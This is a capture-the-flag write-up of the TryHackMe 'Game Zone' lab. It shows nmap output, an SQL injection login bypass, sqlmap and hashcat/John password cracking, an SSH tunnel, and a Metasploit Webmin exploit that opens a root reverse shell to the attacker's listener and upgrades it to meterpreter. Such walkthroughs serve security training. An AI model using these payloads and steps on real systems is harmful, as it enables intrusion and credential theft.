CTF-Writeups/TryHackMe/Game_Zone.md
2020-11-05 23:01:26 +05:00

20 KiB

TryHackMe-Game Zone

NMAP

Nmap scan report for 10.10.76.196
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80

This page is vulnerable to sqli , lets test it using username as ' or 1=1 -- and leaving the password blank

Burpsuite

Lets use burp to capture the search request on page portal.php in order to send it to sqlmap to exilftrate data.

Save the whole request in a text file

Sqlmap

Obtained sha256 hash agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

Hashcat

 hashcat -a 0 -m 1400 --user  hash /usr/share/wordlists/rockyou.txt

Here -a is the attack mode which is set to Straight and -m tells the hashing algorithm in which it is sha2-256

Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA2-256
Hash.Target......: ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218...3efd14
Time.Started.....: Thu Nov  5 21:26:24 2020 (1 sec)
Time.Estimated...: Thu Nov  5 21:26:25 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2992.0 kH/s (0.78ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2891776/14344385 (20.16%)
Rejected.........: 0/2891776 (0.00%)
Restore.Point....: 2887680/14344385 (20.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: vikes! -> vida82vida82

root@kali:~/TryHackMe/Easy/Game Zone# hashcat -a 0 -m 1400 --user --show  hash
agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14:videogamer124

JohnTheRipper

john hash --wordlist=/usr/share/wordlists/rockyou.txt                                                         
Warning: detected hash type "gost", but the string is also recognized as "HAVAL-256-3"                                                              
Use the "--format=HAVAL-256-3" option to force loading these as that type instead                                                                   
Warning: detected hash type "gost", but the string is also recognized as "Panama"                                                                   
Use the "--format=Panama" option to force loading these as that type instead                                                                        
Warning: detected hash type "gost", but the string is also recognized as "po"                                                                       
Use the "--format=po" option to force loading these as that type instead                                                                            
Warning: detected hash type "gost", but the string is also recognized as "Raw-Keccak-256"                                                           
Use the "--format=Raw-Keccak-256" option to force loading these as that type instead                                                                
Warning: detected hash type "gost", but the string is also recognized as "Raw-SHA256"                                                               
Use the "--format=Raw-SHA256" option to force loading these as that type instead                                                                    
Warning: detected hash type "gost", but the string is also recognized as "skein-256"                                                                
Use the "--format=skein-256" option to force loading these as that type instead                                                                     
Warning: detected hash type "gost", but the string is also recognized as "Snefru-256"                                                               
Use the "--format=Snefru-256" option to force loading these as that type instead                                                                    
Warning: detected hash type "gost", but the string is also recognized as "Stribog-256"                                                              
Use the "--format=Stribog-256" option to force loading these as that type instead                                                                   
Using default input encoding: UTF-8                                                                                                                 
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])                                                                                              
Will run 4 OpenMP threads                                                                                                                           
Press 'q' or Ctrl-C to abort, almost any other key for status                                                                                       
0g 0:00:00:08 DONE (2020-11-05 21:30) 0g/s 1639Kp/s 1639Kc/s 1639KC/s !!12Honey..*7¡Vamos!                                                          
Session completed                                                                           
john --show --format=RAW-SHA256 hash
agent47:videogamer124

So you can use both to crack hashes

SSH (PORT 22)

Now we have the username agent47 and passowrd videogamer124 we can ssh into the box

Reverse SSH Port Forwarding

Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side.

-L is a local tunnel (YOU <-- CLIENT). If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do ssh -L 9000:imgur.com:80 user@example.com. Going to localhost:9000 on your machine, will load imgur traffic using your other server.

-R is a remote tunnel (YOU --> CLIENT). You forward your traffic to the other server for others to view. Similar to the example above, but in reverse.

Run ss -tulpn

agent47@gamezone:~$ ss -tulpn
Netid State      Recv-Q Send-Q          Local Address:Port                         Peer Address:Port              
udp   UNCONN     0      0                           *:10000                                   *:*                  
udp   UNCONN     0      0                           *:68                                      *:*                  
tcp   LISTEN     0      80                  127.0.0.1:3306                                    *:*                  
tcp   LISTEN     0      128                         *:10000                                   *:*                  
tcp   LISTEN     0      128                         *:22                                      *:*                  
tcp   LISTEN     0      128                        :::80                                     :::*                  
tcp   LISTEN     0      128                        :::22                                     :::

There are 5 tcp ports running

We can see that a service running on port 10000 is blocked via a firewall rule from the outside (we can see this from the IPtable list). However, Using an SSH Tunnel we can expose the port to us (locally)!

From our local machine, run ssh -L 10000:localhost:10000 @

Once complete, in your browser type "localhost:10000" and you can access the newly-exposed webserver.

PORT 10000

Login with the same crdentials (agent47:videogamer124)

Metasploit

msf5 > search webmin  1.580                                               
                                                                                                                                                    
Matching Modules                                                          
================                                                          
                                                                          
   #  Name                                         Disclosure Date  Rank       Check  Description                                                   
   -  ----                                         ---------------  ----       -----  -----------
   0  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File A
ccess                                                                     
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_backdoor           2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor                           
   3  exploit/linux/http/webmin_packageup_rce      2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution               
   4  exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution                
   5  exploit/unix/webapp/webmin_upload_exec       2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE                               
                                                                                                                                                    
                                                                                                                                                    
Interact with a module by name or index, for example use 5 or use exploit/unix/webapp/webmin_upload_exec                                            
                                                                                                                                                    
msf5 > use 4                                                              

msf5 exploit(unix/webapp/webmin_show_cgi_exec) > show options                                                                                       
                                                                                                                                                    
Module options (exploit/unix/webapp/webmin_show_cgi_exec):                                                                                          
                                                                          
   Name      Current Setting  Required  Description                                                                                                 
   ----      ---------------  --------  -----------                                                                                                 
   PASSWORD  videogamer124    yes       Webmin Password                                                                                             
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]                                                
   RHOSTS    lo               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'                          
   RPORT     10000            yes       The target port (TCP)                                                                                       
   SSL       false            yes       Use SSL                                                                                                     
   USERNAME  agent47          yes       Webmin Username                                                                                             
   VHOST                      no        HTTP server virtual host                                                                                    
                                                                          
                                                                                                                                                    
Exploit target:                                                                                                                                     
                                                                          
   Id  Name                                                               
   --  ----                                                               
   0   Webmin 1.580                                                       
                                                                          
                                                                                                                                                    
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > exploit                                                                                            
                                                                          
[-] Exploit failed: An exploitation error occurred.                       
[*] Exploit completed, but no session was created.             

This didn't worked because we didn't set the unix payload

set PAYLOAD cmd/unix/reverse

Module options (exploit/unix/webapp/webmin_show_cgi_exec):      
                                     
   Name      Current Setting  Required  Description                       
   ----      ---------------  --------  -----------                       
   PASSWORD  videogamer124    yes       Webmin Password                   
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]                                                
   RHOSTS    localhost        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'                          
   RPORT     10000            yes       The target port (TCP)                                                                                       
   SSL       false            yes       Use SSL     
   USERNAME  agent47          yes       Webmin Username                   
   VHOST                      no        HTTP server virtual host          
                                     
                                     
Payload options (cmd/unix/reverse):
                                     
   Name   Current Setting  Required  Description                          
   ----   ---------------  --------  -----------                          
   LHOST  10.14.3.143      yes       The listen address (an interface may be specified)                                                             
   LPORT  4444             yes       The listen port                                                                                                
                                                                          
                                                                          
Exploit target:   
                                                                          
   Id  Name        
   --  ----                                                               
   0   Webmin 1.580                                                       
                                     
                                                                                                                                                    
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > exploit                  
[*] Exploiting target 0.0.0.1                                                                 
[*] Started reverse TCP double handler on 10.14.3.143:4444                
[*] Attempting to login...                                                
[-] Authentication failed            
[*] Exploiting target 127.0.0.1      
[*] Started reverse TCP double handler on 10.14.3.143:4444 
[*] Attempting to login...           
[+] Authentication successfully                                           
[+] Authentication successfully                                           
[*] Attempting to execute the payload...                                                                                                            
[+] Payload executed successfully                                                                                                                   
[*] Accepted the first client connection...                                                                                                         
[*] Accepted the second client connection...                              
[*] Command: echo IMGwgkPDtJucxdvk;                                       
[*] Writing to socket A                                                   
[*] Writing to socket B                                                   
[*] Reading from sockets...                                               
[*] Reading from socket A                                                 
[*] A: "IMGwgkPDtJucxdvk\r\n"                                             
[*] Matching...                                                                                                                                     
[*] B is input...                                                                                                                                   
[*] Command shell session 1 opened (10.14.3.143:4444 -> 10.10.76.196:40646) at 2020-11-05 22:49:31 +0500                                            
[*] Session 1 created in the background.                                  

msf5 exploit(unix/webapp/webmin_show_cgi_exec) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.14.3.143:4444 -> 10.10.76.196:40646 (127.0.0.1)

msf5 exploit(unix/webapp/webmin_show_cgi_exec) > sessions -i 1
[*] Starting interaction with 1...

pwd 
/usr/share/webmin/file/
id
uid=0(root) gid=0(root) groups=0(root)

Upgrading shell to meterpreter

[*] Upgrading session ID: 1
pwd
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.14.3.143:4433 
[*] Sending stage (980808 bytes) to 10.10.76.196
[*] Meterpreter session 2 opened (10.14.3.143:4433 -> 10.10.76.196:44438) at 2020-11-05 22:57:31 +0500
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > pwd
[*] exec: pwd

/root/TryHackMe/Easy/Game Zone
msf5 post(multi/manage/shell_to_meterpreter) > sessions 

Active sessions
===============

  Id  Name  Type                   Information                                                       Connection
  --  ----  ----                   -----------                                                       ----------
  1         shell cmd/unix                                                                           10.14.3.143:4444 -> 10.10.76.196:40646 (127.0.0
.1)
  2         meterpreter x86/linux  no-user @ gamezone (uid=0, gid=0, euid=0, egid=0) @ 10.10.76.196  10.14.3.143:4433 -> 10.10.76.196:44438 (10.10.7
6.196)

msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > pwd
/root
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: no-user @ gamezone (uid=0, gid=0, euid=0, egid=0)
meterpreter >